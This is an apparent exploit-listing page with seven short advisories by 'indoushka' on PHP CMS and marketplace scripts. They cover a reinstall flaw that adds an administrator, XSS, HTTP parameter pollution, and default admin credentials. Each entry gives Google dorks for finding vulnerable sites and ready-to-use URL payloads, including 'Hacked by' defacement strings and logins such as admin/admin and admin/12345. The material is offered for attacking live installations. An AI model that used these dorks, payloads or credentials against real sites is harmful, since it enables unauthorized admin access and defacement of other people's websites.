Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : Ciuis™ CRM v1.0.7 add administrator Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : https://codelist.cc/php-script/233000-ciuis-crm-v107.html | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] suffers from an add administrator vulnerability because after the first installation, the installation file repeats the installation process. [+] use payload 01 : /install/app/pages/complete.php [+] use payload 02 : /install/app/pages/requirements.php [+] http://127.0.0.1/drmcrmcom/install/app/pages/complete.php [+] http://127.0.0.1/drmcrmcom/install/app/pages/requirements.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Chipsa CMS v1.0.2 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://chipsa.ru | | # Dork : intext:''Дизайн: «Чипса» Разработка сайта: weltgroup'' site:ru | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] use payload : /search/?name=%3Cscript%3Ealert%28%2Findoushka%2F%29%3B%3C%2Fscript%3E or put your payload in search box [+] http://127.0.0.1/krascorru/search_full_art/%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E/ Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Chevereto CMS V3.7.0 HPP Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : https://chevereto.com/ | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] Vulnerability description: This script is possibly vulnerable to HTTP Parameter Pollution attacks. HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If the web application does not properly sanitize the user input, a malicious user can compromise the logic of the application to perform either clientside or server-side attacks. [+] This vulnerability affects : /chevereto/search/images. [+] Attack details: URL encoded GET input q was set to H!%26im%3dindoushka Parameter precedence: last occurrence Affected link: http://127.0.0.1/democheveretocom/search/images/?q=H!%26im%3dindoushka [+] Affected parameter: q=1 http://127.0.0.1/democheveretocom/search/images/?q=H!%26im%3dindoushka Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>====================================================================================================================================== | # Title : Buzzy - News Viral Lists Polls and Videos V 1.4 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4 | | # Dork : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved." | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] appears to leave default credentials installed after installation. [+] Use Admin : admin@admin.com & Pass : admin [+] http://127.0.0.1/clickhungamacom/ Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Catpops Technobiz CMS v4.0 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://catpops.in | | # Dork : intext:''Designed By Catpops Technobiz'' | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] use payload : /read_article_details.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E [+] http://127.0.0.1/holyheartsin/read_article_details.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E [+] http://127.0.0.1/holyheartsin/alumini.php?choice=success&value=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>====================================================================================================================================== | # Title : Carbiz - Buy Sell Car Marketplace Script V 1.2.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) | | # Vendor : https://codecanyon.net/item/carbiz-buy-sell-car-marketplace-script/21803782 | | # Dork : "© Copyright 2018 Webhelios . All rights reserved" | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] appears to leave default credentials installed after installation. [+] Use Admin : admin & Pass : 12345 [+] Panel http://127.0.0.1/veloxcarsalescom/index.php/en/admin/auth Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>====================================================================================================================================== | # Title : Buzzy - News Viral Lists Polls and Videos V 1.3.2 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4 | | # Dork : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved." | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] appears to leave default credentials installed after installation. [+] Use Admin : admin@admin.com & Pass : admin [+] http://127.0.0.1/clickhungamacom/ Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>